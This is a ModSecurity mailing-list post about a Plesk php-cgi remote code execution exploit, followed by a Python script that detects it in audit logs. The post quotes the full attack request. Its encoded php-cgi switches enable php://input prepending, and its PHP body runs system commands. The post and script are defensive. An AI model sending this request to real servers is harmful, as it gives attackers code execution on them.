I wanted to reach out to the community on this issue and ask for some help.
An exploit for Plesk was released last week - http://seclists.org/fulldisclosure/2013/Jun/21 - and now there are reports of mass exploits from IRC botnets. Reference this link - http://threatpost.com/irc-botnet-leveraging-unpatched-plesk-vulnerability/

Here is an example ModSecurity audit log of running the plesk-simple.pl script against a host:

--c0538227-A--
[10/Jun/2013:16:33:13 --0400] UbY4B8CoAWQAAP3TbGsAAAAC 127.0.0.1 56954 127.0.0.1 80
--c0538227-B--
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
--c0538227-C--
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>

For those of you running the OWASP ModSecurity CRS, this attack would already be picked up by a number of rules/signatures. For example:

Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?php echo "Content-Type:text/html\\r\\n\\r\\n";echo "OK\\n";system("uname -a;id;"); ?>. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"]

I am working on a blog post to highlight this vulnerability and the ModSecurity protections.
It would be useful if anyone who has seen these attacks hit their server could send me some example audit log entries, as I want to show real-world instances vs. only running the PoC.

Thanks.

-- 
Ryan Barnett
Trustwave SpiderLabs
ModSecurity Project Leader
OWASP ModSecurity CRS Project Leader
_______________________________________________
Owasp-modsecurity-core-rule-set mailing list
Owasp-modsecurity-core-rule-set@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
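The detection described in the post, written out as a runnable script. This is an added example and not code from the ModSecurity or CRS projects. It splits a serial-format audit entry into its lettered parts, emulates ModSecurity's ARGS parsing (split on '&', then on the first '=', URL-decode each half), runs the rule 959151 pattern "<\?(?!xml)" over ARGS_NAMES and ARGS, and separately flags a query string that decodes to php-cgi command-line switches. The two audit entries embedded in it are constructed: the first is rebuilt from the request quoted above, the second is a benign form post carrying an XML prolog. The "php-cgi-argv" finding name and the switch regex are this example's own invention, not a CRS rule.

```python
import re
from urllib.parse import unquote_plus

# Constructed audit-log entry: rebuilt from the request quoted in the post so the
# script runs offline. It is not a capture from a live server.
PLESK_ENTRY = r"""--c0538227-A--
[10/Jun/2013:16:33:13 --0400] UbY4B8CoAWQAAP3TbGsAAAAC 127.0.0.1 56954 127.0.0.1 80
--c0538227-B--
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
--c0538227-C--
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>
--c0538227-Z--
"""

# Constructed benign entry: a form field holding an XML prolog, to show that the
# (?!xml) lookahead in rule 959151 leaves it alone.
BENIGN_ENTRY = r"""--deadbeef-A--
[10/Jun/2013:16:40:00 --0400] UbY4B8CoAWQAAP3TbGsAAAAD 127.0.0.1 56960 127.0.0.1 80
--deadbeef-B--
POST /upload.php?id=7 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
--deadbeef-C--
doc=%3C%3Fxml+version%3D%221.0%22%3F%3E
--deadbeef-Z--
"""

PART_HEADER = re.compile(r"^--([0-9a-f]+)-([A-Z])--$", re.M)

# The pattern CRS 2.2.7 rule 959151 applies to ARGS_NAMES and ARGS (quoted above).
PHP_OPEN_TAG = re.compile(r"<\?(?!xml)")

# php-cgi command-line switches that have no business in a query string.
# This regex and the "php-cgi-argv" label are this example's own, not a CRS rule.
PHP_CGI_SWITCH = re.compile(r"(?:^|\s)-(?:d\s+[\w.]+=|n\b|s\b|T\b)")


def parse_audit_entry(text):
    """Split a serial-format ModSecurity audit entry into its lettered parts."""
    marks = list(PART_HEADER.finditer(text))
    parts = {}
    for i, mark in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(text)
        parts[mark.group(2)] = text[mark.end():end].strip("\r\n")
    return parts


def parse_request_part(part_b):
    """Return (method, target, headers) from part B (request line plus headers)."""
    lines = part_b.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def parse_args(raw):
    """Emulate ModSecurity's ARGS parsing: split on '&', then on the first '=', and
    URL-decode each half. A pair with no '=' becomes a name with an empty value,
    which is why the whole PHP payload shows up under ARGS_NAMES in the alert."""
    args = []
    for pair in raw.split("&"):
        if pair:
            name, _sep, value = pair.partition("=")
            args.append((unquote_plus(name), unquote_plus(value)))
    return args


def inspect_entry(entry):
    """Return the decoded request and a list of (rule, location, evidence) findings."""
    parts = parse_audit_entry(entry)
    method, target, headers = parse_request_part(parts["B"])
    path, _sep, query = target.partition("?")
    args = parse_args(query)
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        args += parse_args(parts.get("C", ""))

    findings = []
    for name, value in args:
        for location, text in (("ARGS_NAMES", name), ("ARGS", value)):
            if PHP_OPEN_TAG.search(text):
                findings.append(("959151", location, text[:40]))

    # CGI hands the query string to the script as argv only when the raw string
    # holds no '=' (RFC 3875 sec. 4.4), which is why the exploit percent-encodes
    # every character: the web server must not see an '=' in the switches.
    decoded_query = unquote_plus(query)
    if "=" not in query and PHP_CGI_SWITCH.search(decoded_query):
        findings.append(("php-cgi-argv", "QUERY_STRING", decoded_query))

    return {"method": method, "path": unquote_plus(path),
            "query": decoded_query, "findings": findings}


if __name__ == "__main__":
    for label, entry in (("plesk PoC", PLESK_ENTRY), ("benign", BENIGN_ENTRY)):
        result = inspect_entry(entry)
        print(label, result["method"], result["path"], "?" + result["query"])
        for finding in result["findings"]:
            print("   ", finding)
```

Run against the rebuilt PoC entry the script reports the 959151 match on ARGS_NAMES (the PHP body) and the php-cgi switch string in the decoded query; the benign entry produces no findings because the only "<?" present is the "<?xml" prolog the rule deliberately excludes.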